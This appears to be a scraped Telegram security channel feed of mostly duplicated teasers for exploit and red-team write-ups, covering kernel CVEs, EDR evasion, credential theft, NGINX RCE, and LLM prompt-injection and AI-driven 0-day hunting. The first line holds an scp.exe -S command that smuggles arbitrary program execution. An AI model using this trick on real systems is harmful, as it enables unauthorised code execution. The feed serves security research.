This media is not supported in your browser
VIEW IN TELEGRAM
scp.exe -S "cmd /c c:\windows\system32\calc.exe" . localhost:.
😱18🔥9👍8
CVE-2026-40369: Twelve Bytes to Escape the Browser Sandbox
Original text: “CVE-2026-40369: Twelve Bytes to Escape the Browser Sandbox” — voidsec, VoidSec (20 May 2026). Hex-Rays excerpts, exploit pseudo-code, and offsets below are reproduced verbatim with attribution captions; surrounding prose is paraphrased.
Executive Summary
CVE-2026-40369 is an unprivileged arbitrary 12-byte kernel write primitive sitting inside nt!ExpGetProcessInformation in ntoskrnl.exe. The bug is reachable from any…
https://core-jmp.org/2026/06/cve-2026-40369-twelve-bytes-browser-sandbox-escape/
Original text: “CVE-2026-40369: Twelve Bytes to Escape the Browser Sandbox” — voidsec, VoidSec (20 May 2026). Hex-Rays excerpts, exploit pseudo-code, and offsets below are reproduced verbatim with attribution captions; surrounding prose is paraphrased.
Executive Summary
CVE-2026-40369 is an unprivileged arbitrary 12-byte kernel write primitive sitting inside nt!ExpGetProcessInformation in ntoskrnl.exe. The bug is reachable from any…
https://core-jmp.org/2026/06/cve-2026-40369-twelve-bytes-browser-sandbox-escape/
🔥3
Factoring “Short-Sleeve” RSA Keys with Polynomials
Original text: “Factoring “short-sleeve” RSA keys with polynomials” — Keegan Ryan, The Trail of Bits Blog (12 June 2026). Figures, decompiled code, and synthetic moduli below are reproduced verbatim with attribution captions; surrounding prose is paraphrased.
Executive Summary
What happens when an RSA modulus is generated from a private key whose bits are heavily biased…
https://core-jmp.org/2026/06/factoring-short-sleeve-rsa-keys-with-polynomials/
Original text: “Factoring “short-sleeve” RSA keys with polynomials” — Keegan Ryan, The Trail of Bits Blog (12 June 2026). Figures, decompiled code, and synthetic moduli below are reproduced verbatim with attribution captions; surrounding prose is paraphrased.
Executive Summary
What happens when an RSA modulus is generated from a private key whose bits are heavily biased…
https://core-jmp.org/2026/06/factoring-short-sleeve-rsa-keys-with-polynomials/
🔥2
CVE-2025-8088 — Russia-Linked APTs Are Still Pwning Unpatched WinRAR Installs in Ukraine
Original text: “Russian APTs Still Exploiting Patched WinRAR Flaw CVE-2025-8088” — Pierluigi Paganini, Security Affairs (June 10, 2026). Trend Micro’s reporting and the two illustrations below are reproduced with attribution; prose is original analysis.
Executive Summary
Pierluigi Paganini’s Security Affairs writeup — built on a June 2026 Trend Micro report — documents that CVE-2025-8088, the…
https://core-jmp.org/2026/06/cve-2025-8088-russian-apts-winrar-ukraine-patch-gap/
Original text: “Russian APTs Still Exploiting Patched WinRAR Flaw CVE-2025-8088” — Pierluigi Paganini, Security Affairs (June 10, 2026). Trend Micro’s reporting and the two illustrations below are reproduced with attribution; prose is original analysis.
Executive Summary
Pierluigi Paganini’s Security Affairs writeup — built on a June 2026 Trend Micro report — documents that CVE-2025-8088, the…
https://core-jmp.org/2026/06/cve-2025-8088-russian-apts-winrar-ukraine-patch-gap/
👍3🔥2
From Prompt to Pwned: Chaining LLM and Web Bugs into Admin Takeover
Original text: "From prompt to pwned: chaining LLM and web bugs to Admin" — Norak, Quarkslab’s blog (05 June 2026). Code snippets, payloads and figures below are reproduced verbatim with attribution captions; surrounding prose is paraphrased.
Executive Summary
Prompt injection has become the headline LLM risk, but the Quarkslab red team exercise behind this article…
https://core-jmp.org/2026/06/from-prompt-to-pwned-chaining-llm-and-web-bugs-to-admin/
Original text: "From prompt to pwned: chaining LLM and web bugs to Admin" — Norak, Quarkslab’s blog (05 June 2026). Code snippets, payloads and figures below are reproduced verbatim with attribution captions; surrounding prose is paraphrased.
Executive Summary
Prompt injection has become the headline LLM risk, but the Quarkslab red team exercise behind this article…
https://core-jmp.org/2026/06/from-prompt-to-pwned-chaining-llm-and-web-bugs-to-admin/
🔥1
DCOMIllusionist — Fileless Windows Lateral Movement via .NET DCOM Server Deserialization
Original text: synacktiv/DCOMIllusionist README on GitHub — by Synacktiv, June 2026. Command-line help, CLSID/AppId lists, build commands and short code snippets below are reproduced verbatim with attribution. Diagrams are rendered from the repository’s img/ SVGs.
Executive Summary
DCOMIllusionist is Synacktiv’s open-source C# implementation of a .NET-DCOM-deserialisation lateral-movement primitive originally written up by James Forshaw —…
https://core-jmp.org/2026/06/synacktiv-dcomillusionist-dcom-fileless-lateral-movement/
Original text: synacktiv/DCOMIllusionist README on GitHub — by Synacktiv, June 2026. Command-line help, CLSID/AppId lists, build commands and short code snippets below are reproduced verbatim with attribution. Diagrams are rendered from the repository’s img/ SVGs.
Executive Summary
DCOMIllusionist is Synacktiv’s open-source C# implementation of a .NET-DCOM-deserialisation lateral-movement primitive originally written up by James Forshaw —…
https://core-jmp.org/2026/06/synacktiv-dcomillusionist-dcom-fileless-lateral-movement/
🔥2👍1
Factoring “Short-Sleeve” RSA Keys with Polynomials
Original text: “Factoring “short-sleeve” RSA keys with polynomials” — Keegan Ryan, The Trail of Bits Blog (12 June 2026). Figures, decompiled code, and synthetic moduli below are reproduced verbatim with attribution captions; surrounding prose is paraphrased.
Executive Summary
What happens when an RSA modulus is generated from a private key whose bits are heavily biased…
https://core-jmp.org/2026/06/factoring-short-sleeve-rsa-keys-with-polynomials/
Original text: “Factoring “short-sleeve” RSA keys with polynomials” — Keegan Ryan, The Trail of Bits Blog (12 June 2026). Figures, decompiled code, and synthetic moduli below are reproduced verbatim with attribution captions; surrounding prose is paraphrased.
Executive Summary
What happens when an RSA modulus is generated from a private key whose bits are heavily biased…
https://core-jmp.org/2026/06/factoring-short-sleeve-rsa-keys-with-polynomials/
🔥1
tabby — A Minimal Position-Independent Windows x64 Shellcode Framework, Built Entirely on Linux
Original text: cocomelonc/tabby README on GitHub — by cocomelonc. The screenshots are reproduced from the repository’s img/ folder; technical code snippets and the project-rationale table are reproduced verbatim with attribution. Prose summary is original.
Executive Summary
tabby is cocomelonc’s minimal teaching framework for building position-independent Windows x64 shellcode in C, designed for the upcoming Malware…
https://core-jmp.org/2026/06/tabby-cocomelonc-shellcode-framework-windows-x64/
Original text: cocomelonc/tabby README on GitHub — by cocomelonc. The screenshots are reproduced from the repository’s img/ folder; technical code snippets and the project-rationale table are reproduced verbatim with attribution. Prose summary is original.
Executive Summary
tabby is cocomelonc’s minimal teaching framework for building position-independent Windows x64 shellcode in C, designed for the upcoming Malware…
https://core-jmp.org/2026/06/tabby-cocomelonc-shellcode-framework-windows-x64/
🔥6
Weaponizing Writable SMB Shares to Steal Domain Credentials
Original text: “Weaponizing SMB Shares to Steal Domain Credentials” — Alex Neacsu, Security Café (April 21, 2026). Code snippets and screenshots below are reproduced verbatim with attribution captions.
Executive Summary
Alex Neacsu’s Security Café post is a clean, end-to-end walkthrough of a coercion technique every internal pentester has used and most internal AD environments are…
https://core-jmp.org/2026/06/weaponizing-smb-shares-steal-domain-credentials/
Original text: “Weaponizing SMB Shares to Steal Domain Credentials” — Alex Neacsu, Security Café (April 21, 2026). Code snippets and screenshots below are reproduced verbatim with attribution captions.
Executive Summary
Alex Neacsu’s Security Café post is a clean, end-to-end walkthrough of a coercion technique every internal pentester has used and most internal AD environments are…
https://core-jmp.org/2026/06/weaponizing-smb-shares-steal-domain-credentials/
🔥8👍2
Hunting Active Directory Honeypots: Reading lastLogon as a Decoy Oracle
Original text: “Hunting Honey Pots as Red Teamers” — Charles F. Hamilton, CYPFER Offensive Practice (June 15, 2026). Screenshots and the sam_honeypot_enum.c source are reproduced verbatim with attribution captions.
Executive Summary
Honeytokens and honeypot accounts are some of the highest-signal tripwires defenders can place inside Active Directory: any interaction with them is, by construction, illegitimate.…
https://core-jmp.org/2026/06/hunting-active-directory-honeypots-lastlogon-oracle/
Original text: “Hunting Honey Pots as Red Teamers” — Charles F. Hamilton, CYPFER Offensive Practice (June 15, 2026). Screenshots and the sam_honeypot_enum.c source are reproduced verbatim with attribution captions.
Executive Summary
Honeytokens and honeypot accounts are some of the highest-signal tripwires defenders can place inside Active Directory: any interaction with them is, by construction, illegitimate.…
https://core-jmp.org/2026/06/hunting-active-directory-honeypots-lastlogon-oracle/
🔥6👍1
BindFlt 0x50: Windows 11 25H2 Bugcheck from Malformed Batch Virtualisation Mappings
Research artifact: bindflt-0x50 — author not clearly listed. Independent PoC against bindflt.sys on Windows 11 25H2 (build 26100.8655). The artifact ships struct_fuzz.c, a Makefile, and a kernel minidump (061826-31687-01.dmp); all are reproduced or summarised verbatim below.
SHA-256 hashes (as shipped in the original README):
struct_fuzz.c — a8aa5b568b5d95f32fe2605aa979a4ab186498080174574c08f3b90532285a7a
struct_fuzz.exe (built on the VM) — 6bfbbc67a1f09655287ab3f1ec1ed3144dddb099ff914b2865c16937f57334b9
Executive…
https://core-jmp.org/2026/06/bindflt-0x50-windows-11-25h2-bugcheck-bfvalidateshortname/
Research artifact: bindflt-0x50 — author not clearly listed. Independent PoC against bindflt.sys on Windows 11 25H2 (build 26100.8655). The artifact ships struct_fuzz.c, a Makefile, and a kernel minidump (061826-31687-01.dmp); all are reproduced or summarised verbatim below.
SHA-256 hashes (as shipped in the original README):
struct_fuzz.c — a8aa5b568b5d95f32fe2605aa979a4ab186498080174574c08f3b90532285a7a
struct_fuzz.exe (built on the VM) — 6bfbbc67a1f09655287ab3f1ec1ed3144dddb099ff914b2865c16937f57334b9
Executive…
https://core-jmp.org/2026/06/bindflt-0x50-windows-11-25h2-bugcheck-bfvalidateshortname/
🔥3😱2
Striga: A 500-Line Python Lifter from x86 to LLVM IR
Original text: “Striga: Lifting x86 to LLVM IR with Python” — mrexodia, secret club (May 21, 2026). Code blocks, the control-flow graph and short quotations below are reproduced verbatim with attribution captions.
Executive Summary
Lifting x86 machine code into a higher-level intermediate representation is the foundation of most modern static deobfuscators, devirtualizers, and binary translators…
https://core-jmp.org/2026/06/striga-python-lifter-x86-to-llvm-ir/
Original text: “Striga: Lifting x86 to LLVM IR with Python” — mrexodia, secret club (May 21, 2026). Code blocks, the control-flow graph and short quotations below are reproduced verbatim with attribution captions.
Executive Summary
Lifting x86 machine code into a higher-level intermediate representation is the foundation of most modern static deobfuscators, devirtualizers, and binary translators…
https://core-jmp.org/2026/06/striga-python-lifter-x86-to-llvm-ir/
👍2🔥2
ROP Gadget Hunting on Windows: Building a DEP-Bypass Exploit Chain with rop_scanner
Project: github.com/oxfemale/rop_scanner — offline ROP / JOP / syscall / pivot gadget hunter for Windows PE files, written in C++17, decoder powered by Zydis. Cross-platform (Windows / Linux / macOS), single self-contained binary. Builds on the technique described by 0x12 Dark Development (@Salsa12__) in «Hunting ROP Gadgets in Windows DLLs» on Medium.
Executive Summary
Exploiting…
https://core-jmp.org/2026/06/rop-scanner-windows-rop-gadget-hunting-exploit-chain/
Project: github.com/oxfemale/rop_scanner — offline ROP / JOP / syscall / pivot gadget hunter for Windows PE files, written in C++17, decoder powered by Zydis. Cross-platform (Windows / Linux / macOS), single self-contained binary. Builds on the technique described by 0x12 Dark Development (@Salsa12__) in «Hunting ROP Gadgets in Windows DLLs» on Medium.
Executive Summary
Exploiting…
https://core-jmp.org/2026/06/rop-scanner-windows-rop-gadget-hunting-exploit-chain/
🔥9
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2026-42530 NGINX RCE
*
Подвержен Nginx 1.31 - если включен
*
Господа из Nebula Security обещают сегодня тех обзор на дыру
*
Подвержен Nginx 1.31 - если включен
QUIC*
Господа из Nebula Security обещают сегодня тех обзор на дыру
👍31🔥15
Autonomous Vulnerability Hunting with MCP: Inside a Self-Improving 0-Day Pipeline
Original text: “Autonomous Vulnerability Hunting with MCP” (alt title: “Bullying LLMs into submission to find 0days at scale”) — Andy Gill, ZephrSec – Adventures In Information Security (2026-04-04). Code snippets, tables and figures below are reproduced verbatim with attribution captions.
Executive Summary
Andy Gill of ZephrSec spent the early part of 2026 wiring Claude Code…
https://core-jmp.org/2026/06/autonomous-vulnerability-hunting-mcp-claude-code-pipeline/
Original text: “Autonomous Vulnerability Hunting with MCP” (alt title: “Bullying LLMs into submission to find 0days at scale”) — Andy Gill, ZephrSec – Adventures In Information Security (2026-04-04). Code snippets, tables and figures below are reproduced verbatim with attribution captions.
Executive Summary
Andy Gill of ZephrSec spent the early part of 2026 wiring Claude Code…
https://core-jmp.org/2026/06/autonomous-vulnerability-hunting-mcp-claude-code-pipeline/
👍10🔥3😱1
Windows ARM64 Internals: Pardon The Interruption — Interrupts on Windows for ARM
Original text: “Windows ARM64 Internals: Pardon The Interruption! Interrupts on Windows for ARM” — Connor McGarr, Connor McGarr’s Blog (January 2, 2026). All figures and code listings below are reproduced verbatim from the source with attribution captions.
Executive Summary
Most Windows kernel researchers grew up reading x64 internals: APIC, IDT, IDTR, KiIsrThunk. Windows on ARM…
https://core-jmp.org/2026/06/windows-arm64-internals-interrupts-gic-hyperv-secure-kernel/
Original text: “Windows ARM64 Internals: Pardon The Interruption! Interrupts on Windows for ARM” — Connor McGarr, Connor McGarr’s Blog (January 2, 2026). All figures and code listings below are reproduced verbatim from the source with attribution captions.
Executive Summary
Most Windows kernel researchers grew up reading x64 internals: APIC, IDT, IDTR, KiIsrThunk. Windows on ARM…
https://core-jmp.org/2026/06/windows-arm64-internals-interrupts-gic-hyperv-secure-kernel/
😱3🔥2
LACUNA Chain: Ghost Frames Defeat Every Layer of EDR Call-Stack Detection
Original text: “LACUNA Chain: Ghost Frames — defeats all EDR layers of call-stack-based detection” — Mohamed Alzhrani (@0xmaz), 0xmaz.me (Jun 20, 2026). Licensed CC BY 4.0. Tables, code listings, diagrams and figures below are reproduced verbatim with attribution captions.
Executive Summary
Modern endpoint detection has moved its trustworthiness anchor from userland hooks to kernel-mode telemetry:…
https://core-jmp.org/2026/06/lacuna-chain-ghost-frames-defeat-edr-call-stack-detection/
Original text: “LACUNA Chain: Ghost Frames — defeats all EDR layers of call-stack-based detection” — Mohamed Alzhrani (@0xmaz), 0xmaz.me (Jun 20, 2026). Licensed CC BY 4.0. Tables, code listings, diagrams and figures below are reproduced verbatim with attribution captions.
Executive Summary
Modern endpoint detection has moved its trustworthiness anchor from userland hooks to kernel-mode telemetry:…
https://core-jmp.org/2026/06/lacuna-chain-ghost-frames-defeat-edr-call-stack-detection/
🔥7